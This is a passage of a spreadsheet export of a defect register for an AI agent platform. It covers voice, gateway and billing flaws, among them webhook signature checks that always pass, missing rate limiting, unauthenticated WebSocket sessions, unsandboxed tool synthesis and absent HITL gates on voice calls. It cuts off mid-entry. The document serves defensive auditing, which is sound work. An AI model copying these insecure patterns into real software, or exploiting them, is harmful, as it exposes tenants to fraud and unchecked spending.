`ToolSandboxTester.run_examples` allocates its harness workdir with
`tempfile.mkdtemp(prefix="toolsynth_")` — bare `/tmp`, not the tenant workspace, and not
bind-mounted into the container. Under `ContainerRuntime` the `cwd` does not exist and the
exec fails.
So **the only configuration in which tool synthesis works is the one where the generated
code runs unsandboxed on the host** — the exact inverse of the stated design.
The capability is off by default (`meta_agent.tool_synthesis_enabled = False`), which is
what keeps this from being live today.
---</t>
  </si>
  <si>
    <t>MI-17</t>
  </si>
  <si>
    <t>Prompt evolution writes candidates nothing surfaces urgently</t>
  </si>
  <si>
    <t>### MI-17 — Prompt evolution writes candidates nothing surfaces urgently
**📄 Doc-reported · Low**
`meta_agent_prompt_evolution` runs weekly and writes prompt-update candidates into the
tree. It never auto-applies — an admin must POST the approve endpoint.
That is the correct safety posture. The gap is that nothing notifies anyone that
candidates are waiting, so the queue is only seen by someone who happens to open the
Meta-Intelligence page. A weekly job whose output nobody is told about will accumulate and
then be approved in bulk without review.
---</t>
  </si>
  <si>
    <t>MI-18</t>
  </si>
  <si>
    <t>The test budget is shared and exhaustion looks like a pass</t>
  </si>
  <si>
    <t>### MI-18 — The test budget is shared and exhaustion looks like a pass
**📄 Doc-reported · Medium**
The TestDriver suite runs against a shared `$3.00` budget. Exhaustion produces skipped
cases ([MI-05](#mi-05--a-skipped-test-case-is-not-a-failed-one)) rather than an error.
Since the budget is shared across the board's work, one expensive spec earlier in the day
can silently reduce every later spec's test coverage to nothing.
---</t>
  </si>
  <si>
    <t>MI-19</t>
  </si>
  <si>
    <t>Drift detection compares a hash nothing acts on</t>
  </si>
  <si>
    <t>### MI-19 — Drift detection compares a hash nothing acts on
**📄 Doc-reported · Low**
The platform schema compiler computes a hash of the compiled capability surface and
detects drift between the compiled "firmware" and the live platform.
Detection exists. There is no automated response — no rebuild, no alert, no gate on
promotion. The drift is recorded and a human must notice.
- [`ai/meta/platform_schema_compiler.py`](../../../backend/src/ai/meta/platform_schema_compiler.py)
---</t>
  </si>
  <si>
    <t>VT-01</t>
  </si>
  <si>
    <t>The inbound credit gate has never run</t>
  </si>
  <si>
    <t>12. Voice, Telephony &amp; Messaging</t>
  </si>
  <si>
    <t>### VT-01 — The inbound credit gate has never run
**✅ Verified · Critical**
Both inbound handlers do this:
```python
credit_svc = CreditService(db)
```
Neither function has `db` as a parameter. `twilio_incoming_call` takes only `request`,
`session_manager` and `number_router`; `tata_incoming_call` takes the same three.
The resulting `NameError` is caught by the surrounding `except`, logged as
*"Pre-call credit check failed (allowing call)"*, and **the call proceeds**.
So the pre-call balance check on inbound calls has never executed once. A company with a
zero wallet can receive unlimited inbound calls, each of which costs real telephony and
LLM money.
- [`voice/webhook_router.py:74`](../../../backend/src/voice/webhook_router.py:74) — inside `twilio_incoming_call` (signature at [`:34`](../../../backend/src/voice/webhook_router.py:34))</t>
  </si>
  <si>
    <t>- [`voice/webhook_router.py:615`](../../../backend/src/voice/webhook_router.py:615) — inside `tata_incoming_call` (signature at [`:497`](../../../backend/src/voice/webhook_router.py:497))
- Also recorded as **D-11** in the platform register
**Fix:** use `session_manager.db`, which is already in scope. One line each. Then narrow
the `except` so a coding error cannot masquerade as a transient failure again — that broad
catch is the reason this survived.
---</t>
  </si>
  <si>
    <t>12-VOICE-AND-TELEPHONY-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Broken end to end</t>
  </si>
  <si>
    <t>VT-02</t>
  </si>
  <si>
    <t>Azure Realtime returns a tuple where a session belongs</t>
  </si>
  <si>
    <t>### VT-02 — Azure Realtime returns a tuple where a session belongs
**✅ Verified · High**
`LiveClientFactory.get_live_client` documents its return as:
&gt; `live_client: GeminiLiveClient or AzureRealtimeClient (already connected session)`
The Gemini branch honours that. The Azure branch does not:
```python
client = AzureRealtimeClient(...)
return client, config  # Return both so caller can call client.connect(config)
```
so the factory returns `((client, config), "azure_openai")` — a **tuple**, un-connected,
where the caller expects a live session.
`azure_realtime.py` itself is correct: `connect()` builds a proper `AzureRealtimeSession`
and initialises it. Nothing calls it.
The same path in `web_audio_adapter.py` calls</t>
  </si>
  <si>
    <t>`self.audio_processor.pcm24_to_pcm16(audio_data)`. `AudioProcessor` has `pcm24_to_mulaw`
and `pcm16_to_mulaw` — **there is no `pcm24_to_pcm16`**. That is an `AttributeError` at
the first audio frame.
So Azure OpenAI Realtime is configurable in the admin UI and cannot work.
- [`voice/live_client_factory.py:175`](../../../backend/src/voice/live_client_factory.py:175) — the tuple return
- [`voice/azure_realtime.py:204`](../../../backend/src/voice/azure_realtime.py:204) — the correct, uncalled path
- [`gateway/web_audio_adapter.py:172`](../../../backend/src/gateway/web_audio_adapter.py:172) — the missing method
- Also recorded as **D-18** in the platform register
**Fix:** `await client.connect(config)` in the factory and return the session. Add
`pcm24_to_pcm16` to `AudioProcessor`, or convert through mu-law.
---</t>
  </si>
  <si>
    <t>VT-03</t>
  </si>
  <si>
    <t>Every WhatsApp AI reply is an apology</t>
  </si>
  <si>
    <t>### VT-03 — Every WhatsApp AI reply is an apology
**✅ Verified · High**
The handler calls:
```python
gemini_service = GeminiTextServiceFactory.get_service(
    api_key=agent_context.api_key,
    system_instruction=agent_context.system_instruction,
    model="gemini-2.0-flash"
)
```
The factory's signature is:
```python
def get_service(cls, service_metadata: Dict[str, Any], model=None, system_instruction=None, **kwargs)
```
`service_metadata` is a **required positional** parameter and is not supplied. `api_key` is
absorbed by `**kwargs`. The call raises `TypeError: get_service() missing 1 required</t>
  </si>
  <si>
    <t>positional argument: 'service_metadata'`, which is caught, and every customer receives the
fallback apology string instead of a generated reply.
- [`voice/whatsapp_handler.py:210`](../../../backend/src/voice/whatsapp_handler.py:210) — the call
- [`voice/gemini_text.py:170`](../../../backend/src/voice/gemini_text.py:170) — the signature
- Also recorded as **D-19** in the platform register
**Fix:** pass `service_metadata` from the resolved integration. The agent context already
carries what is needed.
---</t>
  </si>
  <si>
    <t>VT-04</t>
  </si>
  <si>
    <t>Port 8002 is a ghost that Apache still points at</t>
  </si>
  <si>
    <t>### VT-04 — Port 8002 is a ghost that Apache still points at
**✅ Verified · High**
`voice/main.py` is a complete FastAPI app with the three streaming WebSocket endpoints and
even a helpful HTTP 426 diagnostic for a missing `mod_proxy_wstunnel`. Nothing starts it.
The gateway on 8001 serves the real WebSockets. But
`streaming.hirebuddha.com-le-ssl.conf` still rewrites to `ws://127.0.0.1:8002/` and
proxies to `http://localhost:8002/`, and `STREAMING_HOST` still defaults to
`localhost:8002`.
So an unconfigured deployment hands telephony a `wss://` URL pointing at nothing.
- [`voice/main.py`](../../../backend/src/voice/main.py)
- [`deploy/apache/streaming.hirebuddha.com-le-ssl.conf`](../../../deploy/apache/streaming.hirebuddha.com-le-ssl.conf)
- [`common/config.py:10`](../../../backend/src/common/config.py:10)
- Same as [SA-01](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-01--streaming_host-defaults-to-a-service-that-does-not-run)
  and **W-1** in the platform register</t>
  </si>
  <si>
    <t>VT-05</t>
  </si>
  <si>
    <t>Voice tokens are estimated at a flat 167 per second</t>
  </si>
  <si>
    <t>### VT-05 — Voice tokens are estimated at a flat 167 per second
**📄 Doc-reported · High**
There is no real token accounting for voice. When the SKU is not per-minute, cost is:
```python
tokens_per_second = Decimal("167")
estimated_tokens = tokens_per_second * Decimal(str(audio_seconds))
```
Both LLM rows — audio in and audio out — default to the **entire** call duration, because
in a speech-to-speech session both directions are nominally open the whole time.
So a call where the customer talks for 90% of the time is billed the same as one where the
agent does. The estimate may be roughly right on average and it is not right for any
individual call, and there is no way to reconcile it against the provider's bill.
- [`voice/usage_logger.py`](../../../backend/src/voice/usage_logger.py)
---</t>
  </si>
  <si>
    <t>3. T1 — Money and metering</t>
  </si>
  <si>
    <t>VT-06</t>
  </si>
  <si>
    <t>Voice tool calls are unattributed and unbilled</t>
  </si>
  <si>
    <t>### VT-06 — Voice tool calls are unattributed and unbilled
**✅ Verified · High**
The voice handler builds `extra_context` with only `company_id` and `user_id` — no
`run_id`, no `agent_id` — and runs no cost block at all.
A voice agent can call `whatsapp_send_tenant` and `crm_update_lead` with no run linkage and
no ledger entry. Every `ToolInteractionLog` from this path is unlinkable to a run.
- [`voice/websocket_handler.py:993`](../../../backend/src/voice/websocket_handler.py:993)–1000
- Recorded in full as [TL-20](TOOL-LAYER-DEFECTS.md#tl-20--voice-tool-calls-are-unattributed-and-unbilled)
---</t>
  </si>
  <si>
    <t>VT-07</t>
  </si>
  <si>
    <t>Recording-artifact lookup can attach the wrong file</t>
  </si>
  <si>
    <t>### VT-07 — Recording-artifact lookup can attach the wrong file
**📄 Doc-reported · Medium**
When the exact match fails, recording lookup falls back to **time proximity**. If several
calls end together — which is the normal case during a campaign — the fallback can attach
one call's WAV to another call's record.
That is a privacy problem as well as a data-quality one: a customer listening to their call
recording may hear a different customer's call.
---</t>
  </si>
  <si>
    <t>VT-08</t>
  </si>
  <si>
    <t>The outbound and inbound credit gates disagree by design</t>
  </si>
  <si>
    <t>### VT-08 — The outbound and inbound credit gates disagree by design
**📄 Doc-reported · Medium**
At `_setup_live_and_run`, an **outbound** call with insufficient credit is blocked and the
WebSocket closed with code `4002`. An **inbound** call is allowed through with a warning,
"so nobody misses an important call".
That is a defensible product decision. It is recorded here because combined with
[VT-01](#vt-01--the-inbound-credit-gate-has-never-run) — where the earlier inbound gate
never fires either — it means there is **no working credit control on inbound calls at
all**, at either checkpoint.
---</t>
  </si>
  <si>
    <t>VT-09</t>
  </si>
  <si>
    <t>max_calls_per_hour</t>
  </si>
  <si>
    <t>| **VT-09** | `max_calls_per_hour` | Stored on the campaign, shown in the UI, **never enforced**. The only real throttles are `max_concurrent_calls` and a flat 2-second sleep between calls | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>4. T2 — Controls that are stored and ignored</t>
  </si>
  <si>
    <t>VT-10</t>
  </si>
  <si>
    <t>CampaignCall.max_retries</t>
  </si>
  <si>
    <t>| **VT-10** | `CampaignCall.max_retries` | Stored and displayed, never enforced | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>VT-11</t>
  </si>
  <si>
    <t>speaking_rate and pitch</t>
  </si>
  <si>
    <t>| **VT-11** | `speaking_rate` and `pitch` | Parsed off `VoiceConfig` by `GeminiLiveClient` and then dropped — the `speech_config` it builds contains only `voice_name` | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>VT-12</t>
  </si>
  <si>
    <t>_create_native_audio_config vs _create_standard_config</t>
  </si>
  <si>
    <t>| **VT-12** | `_create_native_audio_config` vs `_create_standard_config` | Both return the **same dict**. The capability registry that selects between them changes nothing | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>VT-13</t>
  </si>
  <si>
    <t>DTMF</t>
  </si>
  <si>
    <t>| **VT-13** | DTMF | Completely unimplemented on both providers. There is no digit collection anywhere in the voice package — so no IVR, no menu, no keypad confirmation | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>VT-14</t>
  </si>
  <si>
    <t>The lead queue is written and never drained</t>
  </si>
  <si>
    <t>### VT-14 — The lead queue is written and never drained
**✅ Verified · Medium**
`lead_queue_worker.py` has zero importers, is in no `WorkerSettings.functions`, and is
started by no script. The docs add that its call signature is wrong.
The gateway dispatcher writes leads into `lead_queue`. They accumulate and are never
dialled.
- [`ai/lead_queue_worker.py`](../../../backend/src/ai/lead_queue_worker.py)
- Also [SA-08](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-08--the-lead-queue-fills-up-and-is-never-drained) and **D-21/D-26**
---</t>
  </si>
  <si>
    <t>5. T3 — Correctness and dead ends</t>
  </si>
  <si>
    <t>VT-15</t>
  </si>
  <si>
    <t>"sucess" is a real key on the wire</t>
  </si>
  <si>
    <t>### VT-15 — `"sucess"` is a real key on the wire
**📄 Doc-reported · Low · accept**
Both Tata voice webhook responses return `{"sucess": ...}`. It is misspelled and it is an
**external contract**. Correcting it is a breaking change that needs coordination with the
provider.
Recorded so nobody "fixes" it in passing. Also **D-42** in the platform register.
---</t>
  </si>
  <si>
    <t>VT-16</t>
  </si>
  <si>
    <t>Agent edits take up to five minutes to reach new calls</t>
  </si>
  <si>
    <t>### VT-16 — Agent edits take up to five minutes to reach new calls
**📄 Doc-reported · Medium**
`AgentContextLoader` TTL-caches persona, tools, context-source extraction and the API key
for `VOICE_AGENT_CACHE_TTL_SECONDS` (default 300), because a cold load took 4.5–5 seconds
on the call-setup hot path.
The trade is sound. The cost is that an operator fixing a bad prompt mid-campaign watches
the old prompt keep dialling for up to five minutes, with nothing in the UI explaining
why.
**Fix:** invalidate the cache entry when the entity is updated. The company id is known at
both ends.
---</t>
  </si>
  <si>
    <t>VT-17</t>
  </si>
  <si>
    <t>ensure_chunk_size pads with the wrong byte</t>
  </si>
  <si>
    <t>### VT-17 — `ensure_chunk_size` pads with the wrong byte
**📄 Doc-reported · Low**
It pads with `0x00`, which in mu-law is **maximum negative amplitude**, not silence
(`0xFF` is). Padding therefore appends a burst of full-scale noise rather than quiet.
It is harmless today only because the single caller passes exactly 32,000 bytes — a clean
multiple of 160 — so the padding branch never runs. Any new caller with a different size
gets audible clicks.
---</t>
  </si>
  <si>
    <t>VT-18</t>
  </si>
  <si>
    <t>A campaign's company comes from the agent, not the user</t>
  </si>
  <si>
    <t>### VT-18 — A campaign's company comes from the agent, not the user
**📄 Doc-reported · Low · correct as-is**
Deliberate, and worth knowing: otherwise an `app_admin` creating a campaign would dial from
the wrong tenant's caller ID and bill the wrong wallet.
Recorded so it is not "fixed" into a bug.
---</t>
  </si>
  <si>
    <t>VT-19</t>
  </si>
  <si>
    <t>Silence is measured against the playback horizon</t>
  </si>
  <si>
    <t>### VT-19 — Silence is measured against the playback horizon
**📄 Doc-reported · Low · correct as-is**
Also deliberate. The model can emit a 30-second reply in a 2-second burst; measuring
silence from send time would declare silence while the lead is still listening.
Recorded because it looks wrong on first reading and someone will try to simplify it.
---</t>
  </si>
  <si>
    <t>VT-20</t>
  </si>
  <si>
    <t>Muted audio is sent as zeros rather than dropped</t>
  </si>
  <si>
    <t>### VT-20 — Muted audio is sent as zeros rather than dropped
**📄 Doc-reported · Low · correct as-is**
Gaps break Gemini's end-of-turn detection, so the mute path sends silence frames instead of
sending nothing. Same note: it looks like a bug and is not.
---</t>
  </si>
  <si>
    <t>VT-21</t>
  </si>
  <si>
    <t>A voice call has no run record, so nothing about it is auditable the usual way</t>
  </si>
  <si>
    <t>### VT-21 — A voice call has no run record, so nothing about it is auditable the usual way
**📄 Doc-reported · Medium**
A voice call produces a `VoiceSession`, not an `ExecutionRun`. It has no
`ExecutionStep` rows, no planner, no critics, no CORTEX write-back beyond a
`context_state.call_summary`, no per-turn token accounting and no HITL gates.
That is the intended architecture. The consequences are worth stating plainly:
- Voice work is invisible to every run-based report and dashboard.
- A voice agent that misbehaves cannot be inspected with the trace viewer.
- Nothing a voice call learns reaches the agent's memory.
- Governance checkpoints configured on the entity do not apply to its calls.
An entity that is used both as a text agent and as a voice agent therefore behaves under
two different sets of rules, and only one of them is documented in the builder.
---</t>
  </si>
  <si>
    <t>GW-01</t>
  </si>
  <si>
    <t>No webhook signature is ever verified, and a failure would not block</t>
  </si>
  <si>
    <t>13. The Unified Gateway &amp; Real-Time Transport</t>
  </si>
  <si>
    <t>### GW-01 — No webhook signature is ever verified, and a failure would not block
**✅ Verified · Critical**
Two separate problems, either of which alone would be enough.
**First**, the validators do not validate. The base implementation is:
```python
def validate_signature(self, request_headers: dict, raw_body: bytes) -&gt; bool:
    """Override for signature validation. Default: always True (no validation)."""
    return True
```
Every concrete strategy returns `True` when the header is absent, and the GitHub and
Facebook ones carry a `TODO` where the HMAC comparison belongs.
**Second**, and worse, the result is discarded:
```python
if not strategy.validate_signature(headers, raw_body):
    logger.warning(f"[WebhookRouter] Signature validation failed for source={source}")</t>
  </si>
  <si>
    <t># We still process — providers may retry; we log for audit
```
So even a correctly implemented validator returning `False` would not stop the request.
`POST /webhook/inbound` creates executions. Anyone who can reach it can make any tenant's
agents run, and pay for it.
- [`gateway/webhook_inbound.py:59`](../../../backend/src/gateway/webhook_inbound.py:59) — the base, always `True`
- [`gateway/webhook_inbound.py:161`](../../../backend/src/gateway/webhook_inbound.py:161) LinkedIn · [`:193`](../../../backend/src/gateway/webhook_inbound.py:193) GitHub · [`:250`](../../../backend/src/gateway/webhook_inbound.py:250) Facebook
- [`gateway/webhook_inbound.py:549`](../../../backend/src/gateway/webhook_inbound.py:549) — the ignored result
- Also recorded as **D-05** in the platform register
**Fix:** implement the HMACs and **fail closed**. Pairs with
[GW-03](#gw-03--no-webhook-idempotency).
---</t>
  </si>
  <si>
    <t>13-GATEWAY-AND-REALTIME-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — The edge is not defended</t>
  </si>
  <si>
    <t>GW-02</t>
  </si>
  <si>
    <t>Rate limiting covers one route</t>
  </si>
  <si>
    <t>### GW-02 — Rate limiting covers one route
**✅ Verified · High**
The limiter is constructed with `default_limits=[settings.RATE_LIMIT]`, attached to
`app.state.limiter`, and given an exception handler. **`SlowAPIMiddleware` is never
added.**
Without the middleware, slowapi's `default_limits` apply only to routes carrying an
explicit `@limiter.limit(...)` decorator. Exactly one route has it: the catch-all REST
proxy.
Unlimited, therefore:
| Path | What it does |
|---|---|
| `POST /webhook/inbound` | creates executions |
| `POST /internal/event` | creates executions |
| `WS /stream/audio`, `/stream/twilio/*`, `/stream/tata/*` | opens live LLM sessions |
| `WS /stream/video` | opens peer connections |
The two endpoints that can spend a tenant's money without a login are both in that list.</t>
  </si>
  <si>
    <t>- [`gateway/app.py:80`](../../../backend/src/gateway/app.py:80) — the limiter
- [`gateway/app.py:104`](../../../backend/src/gateway/app.py:104) — `app.state.limiter`, no middleware
- [`gateway/app.py:341`](../../../backend/src/gateway/app.py:341) — the one decorated route
**Fix:** `app.add_middleware(SlowAPIMiddleware)`. One line, and it makes the configured
limit mean what everyone assumes it means.
---</t>
  </si>
  <si>
    <t>GW-03</t>
  </si>
  <si>
    <t>No webhook idempotency</t>
  </si>
  <si>
    <t>### GW-03 — No webhook idempotency
**📄 Doc-reported · High**
Providers retry. Nothing deduplicates. A retried delivery creates a **second execution**
and a second charge.
Every provider sends a delivery id; none is recorded. Combined with
[GW-01](#gw-01--no-webhook-signature-is-ever-verified-and-a-failure-would-not-block), a
single captured webhook body can be replayed indefinitely.
- [`gateway/webhook_inbound.py`](../../../backend/src/gateway/webhook_inbound.py)
- Also recorded as **D-31** in the platform register
**Fix:** store the provider delivery id with a TTL and drop repeats.
---</t>
  </si>
  <si>
    <t>GW-04</t>
  </si>
  <si>
    <t>The auth middleware never sees a WebSocket</t>
  </si>
  <si>
    <t>### GW-04 — The auth middleware never sees a WebSocket
**✅ Verified · High**
`GatewayAuthMiddleware` extends `BaseHTTPMiddleware`, which passes non-HTTP ASGI scopes
straight through. WebSocket connections never enter it.
So the middleware's `/stream/*` branch — which classifies the audio and video channels and
reads `?client_id=` — is **dead code for real WebSocket connections**. And the handshake
`token` parameter it was meant to check is read into a variable and never validated
anywhere.
Live audio sessions are therefore opened without any credential check at the gateway.
- [`gateway/auth_middleware.py:20`](../../../backend/src/gateway/auth_middleware.py:20) — `BaseHTTPMiddleware`
- [`gateway/auth_middleware.py:55`](../../../backend/src/gateway/auth_middleware.py:55) — `GatewayAuthMiddleware`
**Fix:** validate the token inside the WebSocket endpoint itself, where the scope is
available. Middleware is the wrong layer for this.</t>
  </si>
  <si>
    <t>GW-05</t>
  </si>
  <si>
    <t>Rate limits are keyed on 127.0.0.1 in production</t>
  </si>
  <si>
    <t>### GW-05 — Rate limits are keyed on `127.0.0.1` in production
**📄 Doc-reported · High**
`key_func=get_remote_address`. Every request arrives from Apache on the loopback
interface, and **no vhost sets `RemoteIPHeader`**, so `X-Forwarded-For` is never trusted
and the remote address is always `127.0.0.1`.
Every caller in the world therefore shares one bucket. The limit is effectively a global
cap, and one noisy client exhausts it for everyone.
- [`gateway/app.py:80`](../../../backend/src/gateway/app.py:80) — `get_remote_address`
- [`deploy/apache/`](../../../deploy/apache/) — no `RemoteIPHeader` in any vhost
- Also recorded as **D-32** in the platform register
**Fix:** set `RemoteIPHeader X-Forwarded-For` and `RemoteIPInternalProxy 127.0.0.1` in the
vhosts. `mod_remoteip` is already enabled by `setup_apache.sh`.
---</t>
  </si>
  <si>
    <t>GW-06</t>
  </si>
  <si>
    <t>EVENT_BUS_TYPE and the TURN credentials are never read</t>
  </si>
  <si>
    <t>### GW-06 — `EVENT_BUS_TYPE` and the TURN credentials are never read
**📄 Doc-reported · Medium**
Three settings are declared, documented and unused:
| Setting | Reality |
|---|---|
| `EVENT_BUS_TYPE` | never read; `memory` is the only implementation and `kafka` is aspirational |
| `TURN_USERNAME` | never read |
| `TURN_CREDENTIAL` | never read |
The TURN pair matters: WebRTC behind a symmetric NAT needs a relay, and configuring the
credentials does nothing.
`priority` on internal events is likewise stored and ignored.
---</t>
  </si>
  <si>
    <t>3. T1 — Wired to nothing</t>
  </si>
  <si>
    <t>GW-07</t>
  </si>
  <si>
    <t>The event bus is in-process with one subscriber</t>
  </si>
  <si>
    <t>### GW-07 — The event bus is in-process with one subscriber
**✅ Verified · Medium**
"Event bus" suggests infrastructure. It is an `asyncio.Queue` inside one process with
exactly one subscriber, and cross-process delivery happens later via arq.
Consequences:
- A gateway restart loses every envelope that was published but not yet dispatched — after
  the provider has already been told `200 OK`.
- Events published with no consumer registered are counted as **dropped**, not queued.
- `/health` metrics are per-instance.
- [`gateway/event_bus.py`](../../../backend/src/gateway/event_bus.py)
**Fix:** persist the envelope before acknowledging the webhook. Once a provider has been
told the delivery succeeded, in-memory is the wrong durability.
---</t>
  </si>
  <si>
    <t>GW-08</t>
  </si>
  <si>
    <t>The arq fallback runs a full AgentLoop inside the gateway</t>
  </si>
  <si>
    <t>### GW-08 — The arq fallback runs a full AgentLoop inside the gateway
**📄 Doc-reported · High**
When the arq pool is unreachable, `_execute_in_process` runs the whole agent loop as a
fire-and-forget task **in the gateway process**.
That process also serves live audio WebSockets on the same event loop. A single fallback
execution — minutes of LLM calls and tool runs — competes with real-time audio for the
same loop, and the failure mode is stuttering calls rather than an obvious error.
It is convenient in development and dangerous under load, and it triggers exactly when
Redis is already unhealthy.
- [`gateway/dispatcher.py`](../../../backend/src/gateway/dispatcher.py) — `_execute_in_process`
**Fix:** return `503` and let the provider retry. The webhook path is already built around
provider retries.
---</t>
  </si>
  <si>
    <t>GW-09</t>
  </si>
  <si>
    <t>X-Accel-Buffering: no does nothing here</t>
  </si>
  <si>
    <t>### GW-09 — `X-Accel-Buffering: no` does nothing here
**📄 Doc-reported · Low**
The SSE relay sets `X-Accel-Buffering: no` to stop intermediate proxies buffering. That is
an **nginx** header. The deployment uses Apache, which ignores it.
SSE works today because Apache's `ProxyPass` does not buffer these responses by default —
not because of this header. Anyone who adds `mod_deflate` or a caching layer will break
streaming and this header will not save them.
---</t>
  </si>
  <si>
    <t>GW-10</t>
  </si>
  <si>
    <t>aiortc is not installed, and the video path has a second bug behind it</t>
  </si>
  <si>
    <t>### GW-10 — `aiortc` is not installed, and the video path has a second bug behind it
**✅ Verified · Medium**
`aiortc` appears in neither `pyproject.toml` nor the virtualenv, and `video_gateway.py`
imports it conditionally. So `/stream/video` answers the signalling handshake, tells the
client to check the installation, and closes.
The doc records a second defect behind it: even with `aiortc` installed, the audio pipeline
aborts on a `__mro__` line at `video_gateway.py:202`.
So installing the dependency alone will not make video work.
- [`gateway/video_gateway.py:48`](../../../backend/src/gateway/video_gateway.py:48)–65
- [`backend/pyproject.toml`](../../../backend/pyproject.toml)
- Also recorded as **D-16** in the platform register
**Fix:** decide. Either install it and fix line 202, or remove the endpoint, the Apache
upgrade rule and the STUN/TURN settings.
---</t>
  </si>
  <si>
    <t>GW-11</t>
  </si>
  <si>
    <t>[gateway/main.py](../../../backend/src/gateway/main.py) and [gateway/config.py](../../../backend/src/gateway/config.py)</t>
  </si>
  <si>
    <t>| **GW-11** | [`gateway/main.py`](../../../backend/src/gateway/main.py) and [`gateway/config.py`](../../../backend/src/gateway/config.py) | The superseded pure-proxy gateway and its settings class. Only `app.py` and `gateway_config.py` run | ✅ Verified |</t>
  </si>
  <si>
    <t>GW-12</t>
  </si>
  <si>
    <t>@app.on_event("shutdown") / close_proxy_client</t>
  </si>
  <si>
    <t>| **GW-12** | `@app.on_event("shutdown")` / `close_proxy_client` | A custom `lifespan` was supplied at [`app.py:98`](../../../backend/src/gateway/app.py:98), so the `on_event` handler at [`:330`](../../../backend/src/gateway/app.py:330) **never fires**. The shared `httpx` client is never closed on shutdown | ✅ Verified |</t>
  </si>
  <si>
    <t>GW-13</t>
  </si>
  <si>
    <t>EVENT_BUS_TYPE, TURN_USERNAME, TURN_CREDENTIAL, event priority</t>
  </si>
  <si>
    <t>| **GW-13** | `EVENT_BUS_TYPE`, `TURN_USERNAME`, `TURN_CREDENTIAL`, event `priority` | See [GW-06](#gw-06--event_bus_type-and-the-turn-credentials-are-never-read). Delete or wire | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>GW-14</t>
  </si>
  <si>
    <t>| **GW-14** | Both `streaming.hirebuddha.com` vhosts | They point at port 8002, which nothing serves. Part of **W-1** | ✅ Verified |</t>
  </si>
  <si>
    <t>GW-15</t>
  </si>
  <si>
    <t>The proxy copies response headers verbatim after decompressing</t>
  </si>
  <si>
    <t>### GW-15 — The proxy copies response headers verbatim after decompressing
**📄 Doc-reported · Medium**
The reverse proxy copies upstream response headers including `content-length` and
`content-encoding`, while `httpx` has **already decompressed the body**.
Harmless today only because the backend has no `GZipMiddleware`. Adding one — a normal
performance change — silently breaks every proxied response, because the client is told
the body is gzipped and it is not.
- [`gateway/app.py`](../../../backend/src/gateway/app.py) — the catch-all proxy
**Fix:** strip `content-encoding` and `content-length` from the copied headers.
---</t>
  </si>
  <si>
    <t>5. T3 — Correctness and scaling</t>
  </si>
  <si>
    <t>GW-16</t>
  </si>
  <si>
    <t>Auth middleware runs before CORS, so its 401s have no CORS headers</t>
  </si>
  <si>
    <t>### GW-16 — Auth middleware runs before CORS, so its 401s have no CORS headers
**📄 Doc-reported · Low**
Starlette runs middleware in reverse registration order. `GatewayAuthMiddleware` is added
after `CORSMiddleware` and therefore runs before it on the inbound leg — and returns its
401 without CORS headers.
In a browser that surfaces as an opaque CORS error rather than "401 Unauthorized", which
sends the developer looking in entirely the wrong place.
---</t>
  </si>
  <si>
    <t>GW-17</t>
  </si>
  <si>
    <t>Agent selection is LIMIT 1 with no ORDER BY, in three places</t>
  </si>
  <si>
    <t>### GW-17 — Agent selection is `LIMIT 1` with no `ORDER BY`, in three places
**📄 Doc-reported · Medium**
When a webhook or internal event does not name an entity, the gateway picks one with
`LIMIT 1` and no ordering. A tenant with several agents gets a non-deterministic choice —
possibly a different one on each delivery of the same event type.
- Three call sites across [`gateway/dispatcher.py`](../../../backend/src/gateway/dispatcher.py)
- Also recorded as **D-36** in the platform register
---</t>
  </si>
  <si>
    <t>GW-18</t>
  </si>
  <si>
    <t>SSE has no replay and no Last-Event-ID</t>
  </si>
  <si>
    <t>### GW-18 — SSE has no replay and no `Last-Event-ID`
**📄 Doc-reported · Medium**
A reconnecting `EventSource` loses everything that happened while it was disconnected.
There is no event id, no buffer, no replay.
What actually keeps the execution page correct is a 3-second poll running alongside the
stream. So the platform pays for both a live stream and a polling loop, and needs both
because neither is sufficient.
---</t>
  </si>
  <si>
    <t>GW-19</t>
  </si>
  <si>
    <t>SSE terminates on a substring match</t>
  </si>
  <si>
    <t>### GW-19 — SSE terminates on a substring match
**📄 Doc-reported · Medium**
The generator breaks when the raw JSON payload contains `"status": "COMPLETED"`,
`"FAILED"` or `"CANCELLED"`. `agent_loop_sse.py` copies `outcome` into a `status` key
purely so this works.
Any event carrying one of those words inside a tool result or a critic note closes the
stream early, and the user sees a run that appears to stop.
Same as [PO-19](01-PRODUCT-OVERVIEW-DEFECTS.md#po-19--the-sse-stream-closes-on-a-substring-match)
and [SA-I8](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-i8--make-the-sse-terminal-signal-a-field-not-a-substring).
---</t>
  </si>
  <si>
    <t>GW-20</t>
  </si>
  <si>
    <t>The catch-all proxy must stay last, and nothing enforces it</t>
  </si>
  <si>
    <t>### GW-20 — The catch-all proxy must stay last, and nothing enforces it
**✅ Verified · Medium**
`@app.api_route("/{path:path}")` is declared last on purpose. FastAPI matches in
declaration order, so any endpoint added below it is silently swallowed and forwarded to
port 8000, where it 404s.
The protection is a comment.
Same as [SA-16](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-16--route-order-in-the-gateway-is-load-bearing-and-unguarded).
---</t>
  </si>
  <si>
    <t>GW-21</t>
  </si>
  <si>
    <t>WebSocket sessions require affinity that nothing provides</t>
  </si>
  <si>
    <t>### GW-21 — WebSocket sessions require affinity that nothing provides
**📄 Doc-reported · Medium**
`VoiceSession` objects, live LLM sockets, audio buffers and `RTCPeerConnection` objects all
live in the gateway process. A reconnect landing on a second instance finds none of them.
Audio can partially resume via `metadata.session_id`, which re-reads the `VoiceSession`
from Postgres — but the live LLM connection and the buffers do not transfer. WebRTC cannot
resume at all.
Today there is exactly one instance, so this is latent. It is the thing that blocks
horizontal scaling, and it should be decided before it is needed rather than during an
incident.
---</t>
  </si>
  <si>
    <t>BC-01</t>
  </si>
  <si>
    <t>The client chooses how much to credit its own wallet</t>
  </si>
  <si>
    <t>14. Billing, Costing &amp; Credits</t>
  </si>
  <si>
    <t>### BC-01 — The client chooses how much to credit its own wallet
**✅ Verified · Critical**
The Razorpay signature check is correct — HMAC-SHA256 over `order_id|payment_id`, compared
with `hmac.compare_digest`. What happens after it is not.
```python
txn.status = "success"
